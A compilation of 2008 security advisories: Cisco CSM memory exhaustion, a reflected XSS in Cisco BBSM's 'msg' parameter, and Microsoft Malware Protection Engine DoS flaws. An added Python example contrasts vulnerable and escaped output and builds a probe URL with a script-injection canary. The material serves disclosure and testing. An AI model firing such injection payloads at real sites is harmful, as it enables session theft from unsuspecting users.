that are offered by the end point devices behind the CSM or CSM-S.
Note that the supervisor or any other non-CSM or non-CSM-S service
module in the same chassis of the Catalyst 6500 switch or 7600 Series
router that hosts the CSM or CSM-S will not be affected by this
vulnerability.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
This vulnerability is fixed in version 4.2.9 of the Cisco CSM software,
and in version 2.1.8 of the Cisco CSM-S software.
CSM software can be downloaded from
http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-csm?psrtdcat20e2.
Information on how to upgrade the CSM software is available at
http://www.cisco.com/en/US/products/hw/modules/ps2706/products_tech_note09186a0080094526.shtml.
CSM-S software can be downloaded from
http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-csms?psrtdcat20e2.
Information on how to upgrade the CSM-S software is available at
http://www.cisco.com/en/US/docs/interfaces_modules/services_modules/csms/2.1.1/configuration/guide/getstart.html#wp1041858.
Workarounds
===========
There are no workarounds for this vulnerability. When the Cisco CSM or
Cisco CSM-S has run out of memory it will simply stop passing traffic
and it will have to be reloaded. The CSM and CSM-S can be reloaded via
the command "hw-module module <CSM or CSM-S slot number> reset" (Cisco
IOS) or via the command "reset <CSM or CSM-S slot number>" (Cisco CatOS)
from the privileged EXEC prompt of the supervisor. There is no need to
reload the supervisor.
Obtaining Fixed Software
========================
Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for software
upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through prior
or existing agreements with third-party support organizations, such
as Cisco Partners, authorized resellers, or service providers should
contact that support organization for guidance and assistance with the
appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or fix
is the most appropriate for use in the intended network before it is
deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco service
contract, and customers who purchase through third-party vendors but are
unsuccessful in obtaining fixed software through their point of sale
should acquire upgrades by contacting the Cisco Technical Assistance
Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to a
free upgrade. Free upgrades for non-contract customers must be requested
through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
This vulnerability was discovered during the investigation of customer
support cases.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY
ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that omits
the distribution URL in the following section is an uncontrolled copy,
and may lack important information or contain factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-csm.shtml.
In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following
e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.
Revision History
================
+------------------------------------------------------------+
| Revision 1.0 | 2008-May-14 | Initial public release |
+------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in
Cisco products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security
notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
All contents are Copyright (C) 2007-2008 Cisco Systems, Inc. All
rights reserved.
+--------------------------------------------------------------------
Updated: May 14, 2008 Document ID: 105450
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFIKvyq86n/Gc8U/uARAknKAJ4h3Cv1kvEwebcrqEaYQ8J+AWcfvACggljK
o0g1JsSfpI6hXBtkEYmWJj4=
=B29t
-----END PGP SIGNATURE-----
VAR-200805-0355 | CVE-2008-2165 | Cisco Building Broadband Service Manager (BBSM) Captive Portal Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in AccessCodeStart.asp in Cisco Building Broadband Service Manager (BBSM) Captive Portal 5.3 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Cisco BBSM 5.3 is vulnerable; other versions may also be affected. ----------------------------------------------------------------------
Input passed to the "msg" parameter in AccessCodeStart.asp is not
properly sanitised before being returned to a user.
SOLUTION:
Apply patch BBSMPatch5332.zip.
http://tools.cisco.com/support/downloads/go/ImageList.x?relVer=5.3&mdfid=278455427&sftType=Building%20Broadband%20Service%20Manager%20(BBSM)%20Updates&optPlat=&nodecount=2&edesignator=null&modelName=Cisco%20Building%20Broadband%20Service%20Manager%205.3&treeMdfId=281527126&treeName=Network%20Monitoring%20and%20Management
PROVIDED AND/OR DISCOVERED BY:
Brad Antoniewicz
ORIGINAL ADVISORY:
http://archives.neohapsis.com/archives/bugtraq/2008-05/0166.html
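What "not properly sanitised before being returned to a user" looks like in code, beside the fix and the probe a tester uses to tell them apart. This is an added example: it is neither Cisco's BBSM source nor the reporter's code. The path AccessCodeStart.asp and the msg parameter come from the advisory; the host name bbsm.example and the surrounding markup are assumptions.

```python
"""Reflected XSS in a page that echoes its "msg" parameter, and the fix; added example,
not Cisco's BBSM code. bbsm.example is an assumed host; path and parameter name are
the advisory's. The stand-in handler renders "msg" unescaped (the reported defect) and
HTML-escaped, and the probe reports which behaviour a page exhibits."""
import html
from urllib.parse import parse_qs, quote, urlsplit

PROBE = '"><script>alert(1)</script>'   # canary; must never come back verbatim
BASE = "http://bbsm.example/AccessCodeStart.asp?msg="
PROBE_URL = BASE + quote(PROBE)


def render_vulnerable(msg):
    """Attacker-controlled text dropped straight into the markup."""
    return f'<p class="status">{msg}</p>'


def render_fixed(msg):
    """Encode for the HTML text context before reflecting it."""
    return f'<p class="status">{html.escape(msg, quote=True)}</p>'


def handle(url, render):
    """Stand-in request handler: take "msg" from the query string and render it."""
    msg = parse_qs(urlsplit(url).query).get("msg", [""])[0]
    return render(msg)


def reflects_unencoded(url, render):
    """True when the canary is echoed byte-for-byte, i.e. the page is exploitable."""
    return PROBE in handle(url, render)
```

Against a live portal the same probe is sent over HTTP and the response body is searched for the raw canary; a hit means the vendor patch is missing. Encoding at the point of output is the fix, not input filtering, because the same msg value may legitimately contain characters that are only dangerous inside HTML.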
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200805-0217 | CVE-2008-1437 | Microsoft Malware Protection Engine denial of service (DoS) vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in Microsoft Malware Protection Engine (mpengine.dll) 1.1.3520.0 and 0.1.13.192, as used in multiple Microsoft products, allows context-dependent attackers to cause a denial of service (engine hang and restart) via a crafted file, a different vulnerability than CVE-2008-1438.
Attackers can exploit this issue to cause an affected computer to stop responding or to restart. Successful attacks will deny service to legitimate users. ----------------------------------------------------------------------
PROVIDED AND/OR DISCOVERED BY:
The vendor credits SoWhat, Nevis Labs.
ORIGINAL ADVISORY:
MS08-029 (KB952044):
http://www.microsoft.com/technet/security/Bulletin/MS08-029.mspx
----------------------------------------------------------------------
Microsoft Malware Protection Engine TWO DoS Vulnerabilities
By Sowhat of Nevis Labs
Date: 2008.05.14
http://www.nevisnetworks.com
http://secway.org/advisory/AD20080514.txt
CVE: CVE-2008-1437
CVE-2008-1438
Vendor
Microsoft
Affected:
Windows Live OneCare
Microsoft Antigen for Exchange
Microsoft Antigen for SMTP Gateway
Microsoft Windows Defender
Microsoft Forefront Client Security
Microsoft Forefront Security for Exchange Server
Microsoft Forefront Security for SharePoint
Standalone System Sweeper located in Diagnostics and Recovery Toolset 6.0
Details:
There are two vulnerabilities identified in Microsoft antivirus products.
These vulnerabilities can be exploited to cause denial of service.
1. CVE-2008-1437 PE Parsing Memory Corruption
While scanning a specially crafted PE file, the Malware Protection Engine
(MsMpEng.exe/mpengine.dll for Windows Live OneCare) will crash.
Currently, There's no evidence of code execution found.
Please note that this vulnerability can be triggered in various ways:
a. by sending emails to target mail server which is protected by MS
antivirus
b. by sending emails to victim who is using Windows Onecare or Windows
Defender.
c. by convincing the victim to visit some websites.
d. by sending files (can be any extension) to victims through P2P/IM.
Real Time protection is enabled by default, so in cases b and c, the vulnerability
can be exploited without any further user interaction after the victim received
the email or opened the website.
2. CVE-2008-1438 PE Parsing Disk Space D.o.S
When a specially crafted file with a malformed "size of header" is scanned by
Microsoft Windows OneCare, there will be a disk space DoS condition.
Microsoft Malware Protection Engine will allocate as much disk space as the
PE file "claimed"; it can "eat" several GB of disk space on the Windows
installation drive.
Proof of Concept:
No POC will be released.
Fix:
Microsoft has released an update addressing this issue.
http://www.microsoft.com/technet/security/Bulletin/MS08-029.mspx
Vendor Response:
2008.04.18 Vendor notified via email
2008.04.18 Vendor response, developing for patch
2008.05.14 Patch Release
2008.05.14 Advisory released
--
Sowhat
http://secway.org
"Life is like a bug, Do you know how to exploit it ?"
The most severe
vulnerabilities could allow a remote, unauthenticated attacker to
execute arbitrary code.
II. Impact
A remote, unauthenticated attacker could execute arbitrary code, gain
elevated privileges, or cause a denial of service.
III. Solution
Apply updates from Microsoft
Microsoft has provided updates for these vulnerabilities in the May
2008 Security Bulletin Summary. The security bulletin describes any
known issues related to the updates. Administrators are encouraged to
note these issues and test for any potentially adverse effects.
Administrators should consider using an automated update distribution
system such as Windows Server Update Services (WSUS).
IV. References
* US-CERT Vulnerability Notes for Microsoft May 2008 updates -
<http://www.kb.cert.org/vuls/byid?searchview&query=ms08-may>
* Microsoft Security Bulletin Summary for May 2008 -
<http://www.microsoft.com/technet/security/bulletin/ms08-may.mspx>
* Microsoft Update -
<https://www.update.microsoft.com/microsoftupdate/>
* Windows Server Update Services -
<http://www.microsoft.com/windowsserversystem/updateservices/default.mspx>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA08-134A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA08-134A Feedback VU#534907" in the
subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2008 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
May 13, 2008: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBSCnrE/RFkHkM87XOAQJAoAf/XrkJlT9AS30/CZwAMO9qta8TbtLQTZR3
/yAV/h2CmOKhFsbjdh8L4+GcP0n66twWhmMBfBs6BosOoaqqhkeJcE6JoyQ2Kso1
MnhXjPJuGtgEPcfYX9bg42rnZ5WDXGh9EuhoZVyUV4UeUQ8qRM8LL3OIWBHubE7R
fcOqIVDz/qtCC1U+RUdrbdeV8XB48mshiLoWjxzOT0FzeOKsBwsyHzaO5mAeEy4E
1hsLC2u4idGlq9Ezl82XODyH6vtHBKq7yKDv+FkVHbCqwB+thqPkUo2es+amASra
shcJggg39WWmPWphqnBz94rkdwitsvW3ymOWt1F27GecX1sveofLDQ==
=rhf4
-----END PGP SIGNATURE-----
VAR-200805-0218 | CVE-2008-1438 | Microsoft Malware Protection Engine denial of service (DoS) vulnerability via temporary file creation |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in Microsoft Malware Protection Engine (mpengine.dll) 1.1.3520.0 and 0.1.13.192, as used in multiple Microsoft products, allows context-dependent attackers to cause a denial of service (disk space exhaustion) via a file with "crafted data structures" that trigger the creation of large temporary files, a different vulnerability than CVE-2008-1437. Processing a file crafted by a third party can create a large temporary file that exhausts disk space, resulting in a denial of service (DoS) condition.
Attackers can exploit this issue to cause an affected computer to stop responding or to restart. Successful attacks will deny service to legitimate users. ----------------------------------------------------------------------
PROVIDED AND/OR DISCOVERED BY:
The vendor credits SoWhat, Nevis Labs.
ORIGINAL ADVISORY:
MS08-029 (KB952044):
http://www.microsoft.com/technet/security/Bulletin/MS08-029.mspx
----------------------------------------------------------------------